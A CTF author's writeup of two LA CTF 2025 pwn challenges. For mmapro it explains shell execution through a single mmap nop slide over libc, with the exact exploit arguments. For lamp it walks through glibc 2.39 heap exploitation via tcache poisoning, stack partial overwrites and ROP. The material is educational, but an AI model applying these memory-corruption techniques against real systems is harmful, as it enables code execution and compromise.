LA CTF 2025 - Author Writeups
Writeups of pwn/mmapro and pwn/lamp from LA CTF 2025.
overview
This year I wrote six challenges for LA CTF: lamp, mmapro, eepy, messenger, and library in the pwn category, and elfisyou in the rev category. My solutions can be found in the challenge archive, but I also decided to provide writeups for two of the challenges that I found particularly interesting.
mmapro
This challenge requires you to spawn a shell using a single mmap syscall. The program exits immediately after the call, not providing control over the contents of the mapped memory. The technique for solving this seems fairly novel, so I’m going to coin it “mmap oriented programming” or MOP for short, although it’s unlikely to be useful outside of contrived challenges like this one.
source
|
|
overview
The program is dynamically linked with glibc 2.37. We are given a libc address leak and must supply six 64-bit arguments to mmap. The program will exit immediately after, which involves calling various libc destructor functions.
In order to modify the subsequent execution of the program in any way, we must clobber a libc code mapping. With the MAP_FIXED flag, mmap will interpret its first argument as an absolute address and replace any existing mappings that overlap the new range. This mapped memory will be completely zeroed, effectively letting us punch a single, contiguous hole of null bytes into libc’s code region. The position and length of this hole are limited to page granularity.
This is an x86-64 binary, so the null byte pages will decode to the repeated instruction add byte ptr [rax], al, which is encoded as two null bytes. This is effectively a nop when rax points to writeable memory. If we start a mapping at some page in libc that is executed while rax points to writeable memory, we can cause the program to nop slide through N pages, N being dependent on our length parameter, and it will continue executing at the start of some later code page.
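To make the slide concrete, here is a toy Python model of what happens when execution runs into zeroed pages. It is not a real x86 decoder: it only understands the two-byte encoding 00 00, and the buffer layout, the function name nop_slide, and the one-byte stand-in for the memory at rax are all made up for illustration.

```python
PAGE = 0x1000

def nop_slide(code: bytes, rip: int, al: int, mem_at_rax: bytearray) -> int:
    """Step over `add byte ptr [rax], al` (bytes 00 00) and return the landing rip."""
    while code[rip:rip + 2] == b"\x00\x00":
        # The instruction's only side effect: add al to the byte rax points at.
        mem_at_rax[0] = (mem_at_rax[0] + al) & 0xFF
        rip += 2
    return rip

# Hypothetical layout: three zeroed pages, then a "landing" page starting with ret.
code = bytes(3 * PAGE) + b"\xc3" + b"\x90" * (PAGE - 1)
scratch = bytearray(1)
landing = nop_slide(code, rip=0x124, al=0, mem_at_rax=scratch)
print(hex(landing))
```

With al equal to zero the slide changes nothing at all, which is the situation when rax holds a page-aligned address.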
This “landing” page can be thought of like a gadget, as it contains some unique instructions that may allow us to continue code execution depending on how it uses memory or registers that we control. The page granularity will slice most instructions in half, but thanks to x86 encoding, these may still be useful to us.
solution
There are 376 pages of code on this libc. We have to first find some valid starting pages, and for each we will have at most 375 different slide lengths into different gadgets. I wrote some scripts to extract these gadgets and began inspecting them manually, but this isn’t super feasible since they often depend on various conditionals and jumps. It would make sense to write a symbolic execution tool for this.
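The search space described above is small enough to enumerate directly. The sketch below lists every whole-page slide from a given starting page; slide_candidates is a hypothetical helper, and the text_end_off value used in the example is a placeholder rather than the real end of this libc's code segment.

```python
PAGE = 0x1000

def slide_candidates(start_off: int, text_end_off: int):
    """Yield (length, landing_offset) for each whole-page slide from start_off."""
    assert start_off % PAGE == 0 and text_end_off % PAGE == 0
    length = PAGE
    while start_off + length < text_end_off:
        # The mapping covers [start_off, start_off + length); execution
        # resumes on the first byte of the page right after it.
        yield length, start_off + length
        length += PAGE

# 0x1a0000 is a placeholder for the end of the code region (assumption).
candidates = list(slide_candidates(0x115000, 0x1A0000))
print(len(candidates), [hex(x) for x in candidates[0]])
```

Each (length, landing offset) pair is one gadget to inspect, either by hand or with tooling.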
There are multiple starting pages that work with a writeable rax, but the most useful one is the page containing the code for the libc mmap function itself, since we will have control over six registers at that point. rax will be the syscall return value, which is the address of the page we mapped, and we can ensure it’s writeable because we control the protection parameter. I wrote a gdb script to test each slide length given this starting page offset of 0x115000 and wrote the contents of the registers on segfault to a file. I found that at length 0x57000 we could control rip. This was due to our parameters being saved on the stack, and the gadget eventually causing a return to those values after calling ioctl.
There are unfortunately a few restrictions to the parameters we must comply with to ensure the mmap succeeds. By bruteforcing, I found that the flags parameter may only have bits set that fall within the mask 0xffffffffffebfff2, and the mapping must be at least writeable and executable, so the prot parameter needs to have its 2 (PROT_WRITE) and 4 (PROT_EXEC) bits set. Additionally, the last parameter, offset, must be page aligned.
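These restrictions can be written down as a quick pre-flight check. This is a sketch under the assumption that the mask means "no bits outside it may be set"; params_ok is a hypothetical helper, the libc base in the example is made up, and the kernel may well enforce further conditions that this does not model.

```python
PAGE = 0x1000
U64 = 0xFFFFFFFFFFFFFFFF
FLAGS_MASK = 0xFFFFFFFFFFEBFFF2    # allowed flag bits, found by bruteforce
PROT_WRITE, PROT_EXEC = 0x2, 0x4   # Linux values

def params_ok(prot: int, flags: int, offset: int) -> bool:
    """Check the three constraints on the mmap arguments described above."""
    forbidden = FLAGS_MASK ^ U64   # bits that must stay clear (0x14000d)
    flags_ok = (flags & forbidden) == 0
    prot_ok = (prot & (PROT_WRITE | PROT_EXEC)) == (PROT_WRITE | PROT_EXEC)
    offset_ok = offset % PAGE == 0
    return flags_ok and prot_ok and offset_ok

# Made-up libc base, only to show how a libc address can double as flags.
base = 0x7FFFF7C00000
print(params_ok(7, base + 0xBDA72, base + 0x115000))
```

Because the forbidden bits include 0x40000 and 0x100000, whether a given libc address passes the flags check depends on where ASLR places the library.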
The gadget reached by the 0x57000 slide returns to our parameters on the stack starting with flags, followed by fd and offset. fd is completely controllable, so I set it to the address of gets, and I set flags to the address of a single ret gadget that complies with the mask (slightly dependent on ASLR). rdi will be set to the address we mapped, meaning the gets call will write our input to our region. After the gets call, we will return to our offset parameter, which we can set to the first page that gets wrote to, and this satisfies the alignment check. We can then send shellcode to gets.
The solution thus boils down to:
mmap(libc.address+0x115000, 0x57000, 7, libc.address+0xbda72, libc.sym.gets, libc.address+0x115000)
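Spelled out with the role each argument plays, the call can be sketched as below. The offsets 0x115000, 0x57000, and 0xbda72 come from this writeup; build_args and MmapArgs are hypothetical names, and gets_off stands in for whatever libc.sym.gets resolves to, so the value used in the example is invented.

```python
from typing import NamedTuple

class MmapArgs(NamedTuple):
    addr: int
    length: int
    prot: int
    flags: int
    fd: int
    offset: int

def build_args(libc_base: int, gets_off: int) -> MmapArgs:
    start = libc_base + 0x115000          # page holding libc's mmap code
    return MmapArgs(
        addr=start,                       # slide starts here (MAP_FIXED)
        length=0x57000,                   # slide length that reaches the gadget
        prot=7,                           # read | write | exec
        flags=libc_base + 0xBDA72,        # doubles as the address of a ret gadget
        fd=libc_base + gets_off,          # returned to second: gets(rdi = mapped addr)
        offset=start,                     # returned to last: the shellcode
    )

# Both values below are made up for illustration.
args = build_args(0x7FFFF7C00000, gets_off=0x80000)
print([hex(a) for a in args])
```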
I will note that it took me testing slides on multiple different libcs before I found one that had a working gadget. My full solve script is provided below.
|
|
lamp
This is an arbitrary heap overflow challenge on glibc 2.39 with no file streams in use and an infinite program loop. We are initially given a heap leak, and allocations are restricted to a max size of 0xff. Input is also taken through a custom gets function that doesn’t null terminate, allowing partial overwrites. There is an amazing writeup of this challenge by Jonathan Keller. It provides a much more detailed description of the solve path compared to my brief overview here, so I highly recommend checking it out. The source for the challenge is provided below.
source
|
|
solution
We first set up a repeatable sysmalloc free primitive to obtain free chunks of sizes up to 0xf0.
|
|
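The size arithmetic behind this primitive can be modelled roughly as follows. This is an assumption based on how glibc's sysmalloc generally treats a corrupted top chunk (it checks the old top, reserves 0x20 bytes for fenceposts, and frees the rest), not a transcription of the challenge's solve code; all function names and the example address are hypothetical.

```python
PAGE = 0x1000
MINSIZE = 0x20
ALIGN_MASK = 0xF

def request2size(req: int) -> int:
    """Chunk size glibc uses for a malloc(req) on x86-64."""
    return max(MINSIZE, (req + 8 + ALIGN_MASK) & ~ALIGN_MASK)

def fake_top_ok(top_addr: int, top_size: int) -> bool:
    """Sanity conditions the old top chunk has to satisfy in sysmalloc."""
    size = top_size & ~0x7
    prev_inuse = top_size & 1
    return size >= MINSIZE and prev_inuse == 1 and (top_addr + size) % PAGE == 0

def freed_chunk_size(top_size: int) -> int:
    """Size of the chunk that gets freed out of the old top."""
    return ((top_size & ~0x7) - 0x20) & ~ALIGN_MASK

# A top chunk of size 0x110 (0x111 with PREV_INUSE) ending on a page boundary.
print(hex(request2size(0xFF)), hex(freed_chunk_size(0x111)))
```

Under this model a corrupted top size of 0x111 yields a free chunk of 0xf0, which lines up with the largest free chunk size mentioned above.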
We can build an arbitrary write primitive by overflowing into freed tcache chunks, a technique described here. There are no file streams and our program never exits, so we’ll need to target the stack to hijack control flow. The run binary that accompanies the challenge execves lamp with a particular argv and envp, which hints at the next step.
We fill up the tcache to get smallbin chunks and partially overwrite the libc arena list pointer to link in a chunk around __libc_argv. The run binary ensures that there are enough environment variables, which result in pointers being placed at offsets that make it a valid unlinkable chunk. This part requires a 4 bit bruteforce for the libc partial overwrite, and it’s the only bruteforce we’ll need.
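The 4 bits come from the usual partial overwrite arithmetic: the low 12 bits of a libc address are fixed by the page offset, so a two-byte overwrite has to guess the remaining nibble. A small sketch, assuming a two-byte overwrite and using a made-up target offset (both helper names are hypothetical):

```python
def partial_overwrite(target_low12: int, nibble_guess: int) -> bytes:
    """Two little-endian bytes: 12 known bits plus one guessed ASLR nibble."""
    assert 0 <= target_low12 < 0x1000 and 0 <= nibble_guess < 16
    return ((nibble_guess << 12) | target_low12).to_bytes(2, "little")

def expected_attempts(unknown_bits: int) -> int:
    """Mean number of tries when each attempt succeeds with probability 2**-bits."""
    return 1 << unknown_bits

# 0xa38 is an invented page offset, not the real offset near __libc_argv.
print(partial_overwrite(0xA38, 0x5).hex(), expected_attempts(4))
```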
When we allocate from the smallbin after forging the entry, it will perform tcache stashing. We set up enough prior smallbin entries such that the __libc_argv chunk is the last chunk linkable into the tcache due to the max of 7 entries, which both prevents corruption and places it as a raw pointer in the heap through the tcache_perthread_struct (TPS).
We use our arbitrary write to overwrite the low 2 bytes of the stack pointer to zero. This will be a valid address that’s guaranteed to be below our current position on the stack. Given our infinite overflow, we can keep sending bytes up the stack until we reach the return address of read, partially overwriting it with the byte 0xa0 to loop main through _start. This is implemented by adding a recv timeout after each byte sent to detect the looping. By keeping track of the number of bytes we have to send before the loop is triggered, we can calculate the low bytes of the stack for future overwrites.
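The counting trick can be sketched without a live target. Below, make_fake_target is a stand-in for the real process (in the actual exploit each send would be followed by a recv with a timeout), and the off-by-one between "bytes sent" and "offset of the return address" is an assumption that depends on how the bytes are counted. All names and addresses are hypothetical.

```python
def find_loop_count(send_byte, max_bytes: int = 0x10000) -> int:
    """Send 0xa0 one byte at a time; return how many bytes were sent when main looped."""
    for sent in range(1, max_bytes + 1):
        if send_byte(0xA0):
            return sent
    raise RuntimeError("loop never triggered")

def make_fake_target(ret_low16: int):
    """Simulated target: writing starts at an address whose low 16 bits are zero."""
    state = {"pos": 0}
    def send_byte(value: int) -> bool:
        looped = state["pos"] == ret_low16 and value == 0xA0
        state["pos"] += 1
        return looped
    return send_byte

def rebuild_address(leak: int, low16: int) -> int:
    """Combine the upper bits of a leaked pointer with the measured low 16 bits."""
    return (leak & ~0xFFFF) | low16

count = find_loop_count(make_fake_target(0x1C38))
low16 = count - 1   # the byte that triggered the loop sits at this offset
print(hex(low16), hex(rebuild_address(0x7FFD1234ABCD, low16)))
```

The last helper assumes the leaked pointer and the return address share everything above the low 16 bits.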
We want a stack leak when main loops in order to set up ROP for later, so before beginning this process, we duplicate a mangled __libc_argv pointer into the 0x20 TPS entry. This is achieved by corrupting the fd to a chunk with the stack pointer as the first qword, which it will mangle when placing into the TPS when the previous chunk is allocated. When we loop main, it will allocate a 0x20 chunk and free it, mangling the current already mangled stack TPS entry and placing it in the first qword, which is leaked to us. Because the mangling happens twice, we end up with a normal stack pointer for our leak, although it being mangled wouldn’t be an issue anyway, since we would have the heap leak to demangle it.
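The reason double mangling cancels out is that glibc's safe-linking is a plain XOR with the storage address shifted right by 12. A minimal sketch with invented addresses, assuming both manglings use storage positions in the same heap page:

```python
def protect_ptr(pos: int, ptr: int) -> int:
    """glibc safe-linking: XOR the pointer with (storage address >> 12)."""
    return (pos >> 12) ^ ptr

# XOR is its own inverse, so revealing is the same operation.
reveal_ptr = protect_ptr

stack_ptr = 0x7FFD1234E5D8   # made-up stack address
pos_a = 0x55555555B2A0       # made-up heap positions in the same page
pos_b = 0x55555555B010

once = protect_ptr(pos_a, stack_ptr)
twice = protect_ptr(pos_b, once)
print(hex(once), hex(twice))

# If only one mangling had happened, the heap leak would be enough to undo it.
heap_leak = 0x55555555B000
recovered = reveal_ptr(heap_leak, once)
```

If the two positions were in different pages, the result would be off by the XOR of the two page numbers, which the heap leak would also let us correct.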
Now we have a full stack leak by combining our calculated byte count with the address leak. We repeat this general process for a libc leak, and finally allocate a chunk on the stack to hold our ROP chain. We then send part of our ROP chain through the strtoul buffer and use a partial overwrite with the byte 0xf8 to redirect to a ret gadget. This initiates our ROP chain and spawns a shell.
I think the idea of starting with a low stack address to both avoid bruteforce and calculate a leak was pretty cool. My full solve script with comments is provided below.
|
|